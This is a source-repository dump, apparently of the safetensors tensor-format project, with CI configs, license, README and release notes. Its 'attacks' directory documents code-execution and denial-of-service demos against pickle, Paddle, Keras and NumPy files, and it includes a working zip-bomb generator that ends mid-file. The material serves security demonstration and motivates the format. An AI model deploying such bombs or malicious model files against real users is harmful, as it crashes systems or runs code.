53 | run: cargo audit -D warnings --ignore RUSTSEC-2021-0145
54 |
55 | - name: Coverage report
56 | if: matrix.os == 'ubuntu-latest'
57 | run: cargo llvm-cov --release --lcov --output-path lcov.info
58 |
59 | # - name: Upload to codecov.io
60 | # if: matrix.os == 'ubuntu-latest'
61 | # uses: codecov/codecov-action@v3
62 | # with:
63 | # token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos
64 | # working-directory: ./safetensors
65 | # fail_ci_if_error: true
66 |
--------------------------------------------------------------------------------
/.github/workflows/stale.yml:
--------------------------------------------------------------------------------
1 | name: 'Close stale issues and PRs'
2 | on:
3 | schedule:
4 | - cron: '30 1 * * *'
5 |
6 | jobs:
7 | stale:
8 | runs-on: ubuntu-latest
9 | steps:
10 | - uses: actions/stale@v8
11 | with:
12 | stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
13 | days-before-stale: 30
14 | days-before-close: 5
15 |
--------------------------------------------------------------------------------
/.github/workflows/trufflehog.yml:
--------------------------------------------------------------------------------
1 | on:
2 | push:
3 |
4 | name: Secret Leaks
5 |
6 | jobs:
7 | trufflehog:
8 | runs-on: ubuntu-latest
9 | steps:
10 | - name: Checkout code
11 | uses: actions/checkout@v4
12 | with:
13 | fetch-depth: 0
14 | - name: Secret Scanning
15 | uses: trufflesecurity/trufflehog@main
16 |
--------------------------------------------------------------------------------
/.github/workflows/upload_pr_documentation.yml:
--------------------------------------------------------------------------------
1 | name: Upload PR Documentation
2 |
3 | on:
4 | workflow_run:
5 | workflows: ["Build PR Documentation"]
6 | types:
7 | - completed
8 |
9 | jobs:
10 | build:
11 | uses: huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml@main
12 | with:
13 | package_name: safetensors
14 | secrets:
15 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }}
16 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | safetensors/target
2 | safetensors/**/Cargo.lock
3 | bindings/python/Cargo.lock
4 | *.bin
5 | *.h5
6 | *.msgpack
7 | *.pt
8 | *.pdparams
9 | *.safetensors
10 | *.npz
11 |
--------------------------------------------------------------------------------
/.pre-commit-config.yaml:
--------------------------------------------------------------------------------
1 | repos:
2 | - repo: https://github.com/Narsil/pre-commit-rust
3 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c
4 | hooks:
5 | - id: fmt
6 | name: "Rust (fmt)"
7 | args: ["--manifest-path", "safetensors/Cargo.toml", "--"]
8 | - id: clippy
9 | name: "Rust (clippy)"
10 | args:
11 | [
12 | "--manifest-path",
13 | "safetensors/Cargo.toml",
14 | "--all-targets",
15 | "--",
16 | "-Dwarnings",
17 | ]
18 | - repo: https://github.com/Narsil/pre-commit-rust
19 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c
20 | hooks:
21 | - id: fmt
22 | name: "Python (fmt)"
23 | args: ["--manifest-path", "bindings/python/Cargo.toml", "--"]
24 | - id: clippy
25 | name: "Python (clippy)"
26 | args:
27 | [
28 | "--manifest-path",
29 | "bindings/python/Cargo.toml",
30 | "--all-targets",
31 | "--",
32 | "-Dwarnings",
33 | ]
34 | - repo: https://github.com/psf/black
35 | rev: 22.3.0
36 | hooks:
37 | - id: black
38 | name: "Python (black)"
39 | args: ["--line-length", "119", "--target-version", "py35"]
40 | types: ["python"]
41 | - repo: https://github.com/pycqa/flake8
42 | rev: 3.8.3
43 | hooks:
44 | - id: flake8
45 | args: ["--config", "bindings/python/setup.cfg"]
46 | - repo: https://github.com/pre-commit/mirrors-isort
47 | rev: v5.7.0 # Use the revision sha / tag you want to point at
48 | hooks:
49 | - id: isort
50 |
--------------------------------------------------------------------------------
/Dockerfile.s390x.test:
--------------------------------------------------------------------------------
1 | FROM s390x/python
2 | RUN wget https://repo.anaconda.com/miniconda/Miniconda3-py311_23.5.2-0-Linux-s390x.sh \
3 | && bash Miniconda3-py311_23.5.2-0-Linux-s390x.sh -b \
4 | && rm -f Miniconda3-py311_23.5.2-0-Linux-s390x.sh
5 | RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | bash -s -- -y
6 | RUN /root/miniconda3/bin/conda install pytorch cpuonly -c pytorch -y
7 | WORKDIR /safetensors/
8 | RUN /root/miniconda3/bin/pip install -U pip pytest
9 | # RUN /root/miniconda3/bin/pip install -U huggingface_hub
10 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors")'
11 | COPY . .
12 | SHELL ["/bin/bash", "-c"]
13 | WORKDIR /safetensors/bindings/python/
14 | RUN source /root/.cargo/env && /root/miniconda3/bin/pip install -e .
15 | RUN /root/miniconda3/bin/pytest -sv tests/test_pt_* tests/test_simple.py
16 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors"); from safetensors.torch import load_file; weights = load_file(filename); assert weights["roberta.embeddings.position_embeddings.weight"][0][0].abs().item() > 1e-10'
17 | ENTRYPOINT /bin/bash
18 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | doc:
2 | cd safetensors && cargo readme > README.md && cargo readme > ../README.md && cd ..
3 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 | Python
12 | [](https://pypi.org/pypi/safetensors/)
13 | [](https://huggingface.co/docs/safetensors/index)
14 | [](https://codecov.io/gh/huggingface/safetensors)
15 | [](https://pepy.tech/project/safetensors)
16 |
17 | Rust
18 | [](https://crates.io/crates/safetensors)
19 | [](https://docs.rs/safetensors/)
20 | [](https://codecov.io/gh/huggingface/safetensors)
21 | [](https://deps.rs/repo/github/huggingface/safetensors?path=safetensors)
22 |
23 | # safetensors
24 |
25 | ## Safetensors
26 |
27 | This repository implements a new simple format for storing tensors
28 | safely (as opposed to pickle) and that is still fast (zero-copy).
29 |
30 | ### Installation
31 | #### Pip
32 |
33 | You can install safetensors via the pip manager:
34 |
35 | ```bash
36 | pip install safetensors
37 | ```
38 |
39 | #### From source
40 |
41 | For the sources, you need Rust
42 |
43 | ```bash
44 | # Install Rust
45 | curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
46 | # Make sure it's up to date and using stable channel
47 | rustup update
48 | git clone https://github.com/huggingface/safetensors
49 | cd safetensors/bindings/python
50 | pip install setuptools_rust
51 | pip install -e .
52 | ```
53 |
54 | ### Getting started
55 |
56 | ```python
57 | import torch
58 | from safetensors import safe_open
59 | from safetensors.torch import save_file
60 |
61 | tensors = {
62 | "weight1": torch.zeros((1024, 1024)),
63 | "weight2": torch.zeros((1024, 1024))
64 | }
65 | save_file(tensors, "model.safetensors")
66 |
67 | tensors = {}
68 | with safe_open("model.safetensors", framework="pt", device="cpu") as f:
69 | for key in f.keys():
70 | tensors[key] = f.get_tensor(key)
71 | ```
72 |
73 | [Python documentation](https://huggingface.co/docs/safetensors/index)
74 |
75 |
76 | ### Format
77 |
78 | - 8 bytes: `N`, an unsigned little-endian 64-bit integer, containing the size of the header
79 | - N bytes: a JSON UTF-8 string representing the header.
80 | - The header data MUST begin with a `{` character (0x7B).
81 | - The header data MAY be trailing padded with whitespace (0x20).
82 | - The header is a dict like `{"TENSOR_NAME": {"dtype": "F16", "shape": [1, 16, 256], "data_offsets": [BEGIN, END]}, "NEXT_TENSOR_NAME": {...}, ...}`,
83 | - `data_offsets` point to the tensor data relative to the beginning of the byte buffer (i.e. not an absolute position in the file),
84 | with `BEGIN` as the starting offset and `END` as the one-past offset (so total tensor byte size = `END - BEGIN`).
85 | - A special key `__metadata__` is allowed to contain free form string-to-string map. Arbitrary JSON is not allowed, all values must be strings.
86 | - Rest of the file: byte-buffer.
87 |
88 | Notes:
89 | - Duplicate keys are disallowed. Not all parsers may respect this.
90 | - In general the subset of JSON is implicitly decided by `serde_json` for
91 | this library. Anything obscure might be modified at a later time, that odd ways
92 | to represent integer, newlines and escapes in utf-8 strings. This would only
93 | be done for safety concerns
94 | - Tensor values are not checked against, in particular NaN and +/-Inf could
95 | be in the file
96 | - Empty tensors (tensors with 1 dimension being 0) are allowed.
97 | They are not storing any data in the databuffer, yet retaining size in the header.
98 | They don't really bring a lot of values but are accepted since they are valid tensors
99 | from traditional tensor libraries perspective (torch, tensorflow, numpy, ..).
100 | - 0-rank Tensors (tensors with shape `[]`) are allowed, they are merely a scalar.
101 | - The byte buffer needs to be entirely indexed, and cannot contain holes. This prevents
102 | the creation of polyglot files.
103 | - Endianness: Little-endian.
104 | moment.
105 | - Order: 'C' or row-major.
106 |
107 |
108 | ### Yet another format ?
109 |
110 | The main rationale for this crate is to remove the need to use
111 | `pickle` on `PyTorch` which is used by default.
112 | There are other formats out there used by machine learning and more general
113 | formats.
114 |
115 |
116 | Let's take a look at alternatives and why this format is deemed interesting.
117 | This is my very personal and probably biased view:
118 |
119 | | Format | Safe | Zero-copy | Lazy loading | No file size limit | Layout control | Flexibility | Bfloat16/Fp8
120 | | ----------------------- | --- | --- | --- | --- | --- | --- | --- |
121 | | pickle (PyTorch) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 |
122 | | H5 (Tensorflow) | 🗸 | ✗ | 🗸 | 🗸 | ~ | ~ | ✗ |
123 | | SavedModel (Tensorflow) | 🗸 | ✗ | ✗ | 🗸 | 🗸 | ✗ | 🗸 |
124 | | MsgPack (flax) | 🗸 | 🗸 | ✗ | 🗸 | ✗ | ✗ | 🗸 |
125 | | Protobuf (ONNX) | 🗸 | ✗ | ✗ | ✗ | ✗ | ✗ | 🗸 |
126 | | Cap'n'Proto | 🗸 | 🗸 | ~ | 🗸 | 🗸 | ~ | ✗ |
127 | | Arrow | ? | ? | ? | ? | ? | ? | ✗ |
128 | | Numpy (npy,npz) | 🗸 | ? | ? | ✗ | 🗸 | ✗ | ✗ |
129 | | pdparams (Paddle) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 |
130 | | SafeTensors | 🗸 | 🗸 | 🗸 | 🗸 | 🗸 | ✗ | 🗸 |
131 |
132 | - Safe: Can I use a file randomly downloaded and expect not to run arbitrary code ?
133 | - Zero-copy: Does reading the file require more memory than the original file ?
134 | - Lazy loading: Can I inspect the file without loading everything ? And loading only
135 | some tensors in it without scanning the whole file (distributed setting) ?
136 | - Layout control: Lazy loading, is not necessarily enough since if the information about tensors is spread out in your file, then even if the information is lazily accessible you might have to access most of your file to read the available tensors (incurring many DISK -> RAM copies). Controlling the layout to keep fast access to single tensors is important.
137 | - No file size limit: Is there a limit to the file size ?
138 | - Flexibility: Can I save custom code in the format and be able to use it later with zero extra code ? (~ means we can store more than pure tensors, but no custom code)
139 | - Bfloat16/Fp8: Does the format support native bfloat16/fp8 (meaning no weird workarounds are
140 | necessary)? This is becoming increasingly important in the ML world.
141 |
142 |
143 | ### Main oppositions
144 |
145 | - Pickle: Unsafe, runs arbitrary code
146 | - H5: Apparently now discouraged for TF/Keras. Seems like a great fit otherwise actually. Some classic use after free issues: . On a very different level than pickle security-wise. Also 210k lines of code vs ~400 lines for this lib currently.
147 | - SavedModel: Tensorflow specific (it contains TF graph information).
148 | - MsgPack: No layout control to enable lazy loading (important for loading specific parts in distributed setting)
149 | - Protobuf: Hard 2Go max file size limit
150 | - Cap'n'proto: Float16 support is not present [link](https://capnproto.org/language.html#built-in-types) so using a manual wrapper over a byte-buffer would be necessary. Layout control seems possible but not trivial as buffers have limitations [link](https://stackoverflow.com/questions/48458839/capnproto-maximum-filesize).
151 | - Numpy (npz): No `bfloat16` support. Vulnerable to zip bombs (DOS). Not zero-copy.
152 | - Arrow: No `bfloat16` support.
153 |
154 | ### Notes
155 |
156 | - Zero-copy: No format is really zero-copy in ML, it needs to go from disk to RAM/GPU RAM (that takes time). On CPU, if the file is already in cache, then it can
157 | truly be zero-copy, whereas on GPU there is not such disk cache, so a copy is always required
158 | but you can bypass allocating all the tensors on CPU at any given point.
159 | SafeTensors is not zero-copy for the header. The choice of JSON is pretty arbitrary, but since deserialization is <<< of the time required to load the actual tensor data and is readable I went that way, (also space is <<< to the tensor data).
160 |
161 | - Endianness: Little-endian. This can be modified later, but it feels really unnecessary at the
162 | moment.
163 | - Order: 'C' or row-major. This seems to have won. We can add that information later if needed.
164 | - Stride: No striding, all tensors need to be packed before being serialized. I have yet to see a case where it seems useful to have a strided tensor stored in serialized format.
165 |
166 | ### Benefits
167 |
168 | Since we can invent a new format we can propose additional benefits:
169 |
170 | - Prevent DOS attacks: We can craft the format in such a way that it's almost
171 | impossible to use malicious files to DOS attack a user. Currently, there's a limit
172 | on the size of the header of 100MB to prevent parsing extremely large JSON.
173 | Also when reading the file, there's a guarantee that addresses in the file
174 | do not overlap in any way, meaning when you're loading a file you should never
175 | exceed the size of the file in memory
176 |
177 | - Faster load: PyTorch seems to be the fastest file to load out in the major
178 | ML formats. However, it does seem to have an extra copy on CPU, which we
179 | can bypass in this lib by using `torch.UntypedStorage.from_file`.
180 | Currently, CPU loading times are extremely fast with this lib compared to pickle.
181 | GPU loading times are as fast or faster than PyTorch equivalent.
182 | Loading first on CPU with memmapping with torch, and then moving all tensors to GPU seems
183 | to be faster too somehow (similar behavior in torch pickle)
184 |
185 | - Lazy loading: in distributed (multi-node or multi-gpu) settings, it's nice to be able to
186 | load only part of the tensors on the various models. For
187 | [BLOOM](https://huggingface.co/bigscience/bloom) using this format enabled
188 | to load the model on 8 GPUs from 10mn with regular PyTorch weights down to 45s.
189 | This really speeds up feedbacks loops when developing on the model. For instance
190 | you don't have to have separate copies of the weights when changing the distribution
191 | strategy (for instance Pipeline Parallelism vs Tensor Parallelism).
192 |
193 | License: Apache-2.0
194 |
--------------------------------------------------------------------------------
/RELEASE.md:
--------------------------------------------------------------------------------
1 | ## How to release
2 |
3 | # Before the release
4 |
5 | Simple checklist on how to make releases for `safetensors`.
6 |
7 | - Freeze `main` branch.
8 | - Run all tests (Check CI has properly run)
9 | - If any significant work, check benchmarks:
10 | - `cd safetensors && cargo bench` (needs to be run on latest release tag to measure difference if it's your first time)
11 | - Run all `transformers` tests. (`transformers` is a big user of `safetensors` we need
12 | to make sure we don't break it, testing is one way to make sure nothing unforeseen
13 | has been done.)
14 | - Run all fast tests at the VERY least (not just the tokenization tests). (`RUN_PIPELINE_TESTS=1 CUDA_VISIBLE_DEVICES=-1 pytest -sv tests/`)
15 | - When all *fast* tests work, then we can also (it's recommended) run the whole `transformers`
16 | test suite.
17 | - Rebase this [PR](https://github.com/huggingface/transformers/pull/16708).
18 | This will create new docker images ready to run the tests suites with `safetensors` from the main branch.
19 | - Wait for actions to finish
20 | - Rebase this [PR](https://github.com/huggingface/transformers/pull/16712)
21 | This will run the actual full test suite.
22 | - Check the results.
23 | - **If any breaking change has been done**, make sure the version can safely be increased for transformers users (`safetensors` version need to make sure users don't upgrade before `transformers` has). [link](https://github.com/huggingface/transformers/blob/main/setup.py#L154)
24 | For instance `safetensors>=0.10,<0.11` so we can safely upgrade to `0.11` without impacting
25 | current users
26 | - Then start a new PR containing all desired code changes from the following steps.
27 | - You will `Create release` after the code modifications are on `master`.
28 |
29 | # Rust
30 |
31 | - `safetensors` (rust, python & node) versions don't have to be in sync but it's
32 | very common to release for all versions at once for new features.
33 | - Edit `Cargo.toml` to reflect new version
34 | - Edit `CHANGELOG.md`:
35 | - Add relevant PRs that were added (python PRs do not belong for instance).
36 | - Add links at the end of the files.
37 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
38 | - Create new Release:
39 | - Mark it as pre-release
40 | - Use new version name with a new tag (create on publish) `vX.X.X`.
41 | - Copy paste the new part of the `CHANGELOG.md`
42 | - ⚠️ Click on `Publish release`. This will start the whole process of building a uploading
43 | the new version on `crates.io`, there's no going back after this
44 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
45 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again.
46 |
47 |
48 | # Python
49 |
50 | - Edit `bindings/python/setup.py` to reflect new version.
51 | - Edit `bindings/python/py_src/safetensors/__init__.py` to reflect new version.
52 | - Edit `CHANGELOG.md`:
53 | - Add relevant PRs that were added (node PRs do not belong for instance).
54 | - Add links at the end of the files.
55 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
56 | - Create new Release:
57 | - Mark it as pre-release
58 | - Use new version name with a new tag (create on publish) `python-vX.X.X`.
59 | - Copy paste the new part of the `CHANGELOG.md`
60 | - ⚠️ Click on `Publish release`. This will start the whole process of building a uploading
61 | the new version on `pypi`, there's no going back after this
62 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
63 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again.
64 | - This CI/CD has 3 distinct builds, `Pypi`(normal), `conda` and `extra`. `Extra` is REALLY slow (~4h), this is normal since it has to rebuild many things, but enables the wheel to be available for old Linuxes
65 |
66 | # Node
67 |
68 | - Edit `bindings/node/package.json` to reflect new version.
69 | - Edit `CHANGELOG.md`:
70 | - Add relevant PRs that were added (python PRs do not belong for instance).
71 | - Add links at the end of the files.
72 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
73 | - Create new Release:
74 | - Mark it as pre-release
75 | - Use new version name with a new tag (create on publish) `node-vX.X.X`.
76 | - Copy paste the new part of the `CHANGELOG.md`
77 | - ⚠️ Click on `Publish release`. This will start the whole process of building a uploading
78 | the new version on `npm`, there's no going back after this
79 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
80 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again.
81 |
82 |
83 | # Testing the CI/CD for release
84 |
85 |
86 | If you want to make modifications to the CI/CD of the release GH actions, you need
87 | to :
88 | - **Comment the part that uploads the artifacts** to `crates.io`, `PyPi` or `npm`.
89 | - Change the trigger mechanism so it can trigger every time you push to your branch.
90 | - Keep pushing your changes until the artifacts are properly created.
91 |
--------------------------------------------------------------------------------
/attacks/README.md:
--------------------------------------------------------------------------------
1 | The purpose of this directory is to showcase various attacks (and creating your own).
2 |
3 |
4 | # Torch Arbitrary code execution
5 |
6 | Try it out. This will create a seemingly innocuous `torch_ace.pt` file.
7 | ```
8 | python torch_ace_create.py
9 | python torch_ace_get_pwned.py
10 | ```
11 |
12 | # PaddlePaddle Arbitrary code execution
13 |
14 | Try it out. This will create a seemingly innocuous `paddle_ace.pdparams` file.
15 | ```
16 | python paddle_ace_create.py
17 | python paddle_ace_get_pwned.py
18 | ```
19 |
20 | # Tensorflow (Keras) Arbitrary Code execution (does not affect `transformers`)
21 |
22 | Try it out. This will create a seemingly innocuous `tf_ace.h5` file.
23 | ```
24 | python tf_dos_create.py
25 | python tf_dos_get_pwned.py
26 | ```
27 |
28 | # Torch Denial of Service (OOM kills the running process)
29 |
30 | Try it out. This will create a seemingly innocuous `torch_dos.pt` file.
31 | ```
32 | python torch_dos_create.py
33 | python torch_dos_get_pwned.py
34 | ```
35 |
36 | # Numpy Denial of Service (OOM kills the running process)
37 |
38 | Try it out. This will create a seemingly innocuous `numpy_dos.npz` file.
39 | ```
40 | python numpy_dos_create.py
41 | python numpy_dos_get_pwned.py
42 | ```
43 |
44 | # Safetensors abuse attempts
45 |
46 | In order to try and check the limits, we also try to abuse the current format.
47 | Please send ideas!
48 |
49 | A few things can be abused:
50 | - Proposal 1: The initial 8 bytes, which could be too big with regards to the file. This crashes, and crashes early (Out of bounds) (Attempt #1).
51 | - Proposal 2: The initial header is JSON, an attacker could use a 4Go JSON file to delay the loads. Debattable how much of an attack this is, but at least
52 | it's impossible to "bomb" (like the DOS attacks above) where the files are vastly smaller than their expanded version (because of zip abuse).
53 | Various "protections" could be put in place, like a header proportion cap (header should always be <<< of the size of the file). (Attempt #2)
54 | - Proposal 3: The offsets could be negative, out of the file. This is all crashing by default.
55 | - Proposal 4: The offsets could overlap. ~~This is actually OK.~~ This is NOT ok.
56 | While testing Proposal 2, I realized that the tensors themselves where all allocated, and gave me an idea for a DOS exploit where you would have a relatively small
57 | file a few megs tops, but defining many tensors on the same overlapping part of the file, it was essentially a DOS attack. The mitigation is rather simple, we sanitize the fact
58 | that the offsets must be contiguous and non overlapping.
59 | - Proposal 5: The offsets could mismatch the declared shapes + dtype. This validated against.
60 | - Proposal 6: The file being mmaped could be modified while it's opened (attacker has access to your filesystem, seems like you're already pwned).
61 | - Proposal 7: serde JSON deserialization abuse (nothing so far: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=serde). It doesn't mean there isn't a flaw. Same goes for the actual rust compiled binary.
62 |
63 | ```
64 | python safetensors_abuse_attempt_1.py
65 | python safetensors_abuse_attempt_2.py
66 | python safetensors_abuse_attempt_3.py
67 | ```
68 |
--------------------------------------------------------------------------------
/attacks/numpy_dos_create.py:
--------------------------------------------------------------------------------
1 | from zipfile import ZIP_DEFLATED, ZipFile
2 |
3 | FILESIZE = 40 * 1000 # 40 Go
4 | BUFFER = b"\0" * 1000 * 1000 # 1Mo
5 |
6 | outfilename = "numpy_dos.npz"
7 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip:
8 | with outzip.open("weights.npy", "w", force_zip64=True) as f:
9 | for i in range(FILESIZE):
10 | f.write(BUFFER)
11 |
--------------------------------------------------------------------------------
/attacks/numpy_dos_get_pwned.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | import numpy as np
4 |
5 | filename = "numpy_dos.npz"
6 |
7 | print(
